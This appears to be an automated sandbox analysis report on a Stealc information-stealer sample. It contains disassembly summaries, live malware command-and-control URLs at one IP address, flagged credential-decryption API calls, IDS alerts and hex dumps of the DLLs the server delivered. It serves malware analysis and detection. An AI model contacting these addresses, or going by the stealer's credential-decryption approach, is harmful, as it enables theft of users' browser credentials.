API String ID: 2811501404-4108050209
Opcode ID: 0665df0fdab35cd1dc20d6c95c15b04168aede084a4b6dac7b535e061fa18fba
Instruction ID: 5405e39e928d43517768fb48cea97d215a68dec3859e8a366a425583ca1b4252
Opcode Fuzzy Hash: 0665df0fdab35cd1dc20d6c95c15b04168aede084a4b6dac7b535e061fa18fba
Instruction Fuzzy Hash: 8241AF71909745CFC321CF28C481A9BB7E4AFCA388F104E1DF98597711E73099498BAA

Function 6C6B3CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6B3D19
mozalloc_abort.MOZGLUE(?), ref: 6C6B3D6C

Strings

d, xrefs: 6C6B3D58

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: _errnomozalloc_abort
String ID: d
API String ID: 3471241338-2564639436
Opcode ID: 5155f0066a790a4c97cf7239ec208bd179e835c11012df392e71ca918102982b
Instruction ID: 2ac950583305eebf2d7cfddfd5d919bbc4549abf67941512d37082b37cdca2c9
Opcode Fuzzy Hash: 5155f0066a790a4c97cf7239ec208bd179e835c11012df392e71ca918102982b
Instruction Fuzzy Hash: C211E635F08648DBDB008F69CC544EDB7B5EF8A318F448229D9556B602EF30A594C358

Function 6C6D6DE0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_DISABLE_WALKTHESTACK), ref: 6C6D6E22
__Init_thread_footer.LIBCMT ref: 6C6D6E3F

Strings

MOZ_DISABLE_WALKTHESTACK, xrefs: 6C6D6E1D

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Init_thread_footergetenv
String ID: MOZ_DISABLE_WALKTHESTACK
API String ID: 1472356752-1153589363
Opcode ID: e81fcc4c8327824d038be25f8a1f3eda9beba984b7355ca2d94826c7de75df98
Instruction ID: 42f6c6c444465a5fcbb1850d3696925d13f3e2c668186a882d7c248f208fc7ea
Opcode Fuzzy Hash: e81fcc4c8327824d038be25f8a1f3eda9beba984b7355ca2d94826c7de75df98
Instruction Fuzzy Hash: 79F024712082428BDB008B6AE8D2A8977B35313318F050565C42186B61CF21F907CE9F

Function 6C686C30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(0Kkl,?,6C6B4B30,80000000,?,6C6B4AB7,?,6C6743CF,?,6C6742D2), ref: 6C686C42

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

moz_xmalloc.MOZGLUE(0Kkl,?,6C6B4B30,80000000,?,6C6B4AB7,?,6C6743CF,?,6C6742D2), ref: 6C686C58

Strings

0Kkl, xrefs: 6C686C33, 6C686C41, 6C686C57

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: moz_xmalloc$malloc
String ID: 0Kkl
API String ID: 1967447596-1873664643
Opcode ID: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction ID: 2e4e7c6975ee3e1990aad6bf5d593c523e8b20b9b682b7a7945fd5eea9956236
Opcode Fuzzy Hash: 26e400adbc4dd1962c0462c652a8f496a88607757228c19233f06711ec6135b5
Instruction Fuzzy Hash: B0E086F1A265055A9B08997CAC4956A71C89B153A87044A3AE823C6BC8FA98E590817D

Function 6C6CB5C0 Relevance: 5.1, APIs: 4, Instructions: 145COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,6C6CB2C9,?,?,?,6C6CB127,?,?,?,?,?,?,?,?,?,6C6CAE52), ref: 6C6CB628

Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C90FF
Part of subcall function 6C6C90E0: free.MOZGLUE(?,00000000,?,?,6C6CDEDB), ref: 6C6C9108

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6CB2C9,?,?,?,6C6CB127,?,?,?,?,?,?,?,?,?,6C6CAE52), ref: 6C6CB67D
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000008,6C6CB2C9,?,?,?,6C6CB127,?,?,?,?,?,?,?,?,?,6C6CAE52), ref: 6C6CB708
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,6C6CB127,?,?,?,?,?,?,?,?), ref: 6C6CB74D

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: freemalloc
String ID:
API String ID: 3061335427-0
Opcode ID: cfbaecc6b1e6a2093cf2f3054561f1a08e97e8461b00ffedd98b3dcad4a1e6d3
Instruction ID: c70f350c5f6f31d5a44318969ca7ac2b46316eb4bdaefc345ef2fcb3e766e7d6
Opcode Fuzzy Hash: cfbaecc6b1e6a2093cf2f3054561f1a08e97e8461b00ffedd98b3dcad4a1e6d3
Instruction Fuzzy Hash: 2F51DCB1B052168FDB14CF19C9847AEB7B5FF85309F05852DCC5AAB700DB31A814CBAA

Source: http://185.215.113.100/	URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php	URL Reputation: Label: malware
Source: http://185.215.113.100	URL Reputation: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpH;	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php=Iq	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phph	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpion:	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dllK	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpBrowser	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpm	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpp	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpf	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/mozglue.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpndI	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/softokn3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php:	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/sqlite3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dllc	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php(	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/freebl3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/nss3.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dlll5	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php0	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/vcruntime140.dllN	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dll	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php$	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.php3	Avira URL Cloud: Label: malware
Source: 185.215.113.100/e2b1563c6670f193.php	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/0d60be0de163924d/msvcp140.dll)	Avira URL Cloud: Label: malware
Source: http://185.215.113.100/e2b1563c6670f193.phpLo	Avira URL Cloud: Label: malware

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00189BB0 CryptUnprotectData,LocalAlloc,LocalFree,	0_2_00189BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00198940 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	0_2_00198940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00187280 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00187280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00189B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00189B10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0018C660 lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0018C660
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C686C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C686C80

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.100:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.5:49704 -> 185.215.113.100:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.100:80 -> 192.168.2.5:49704
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.5:49704 -> 185.215.113.100:80

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:01 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:08 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 29 Aug 2024 22:48:09 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
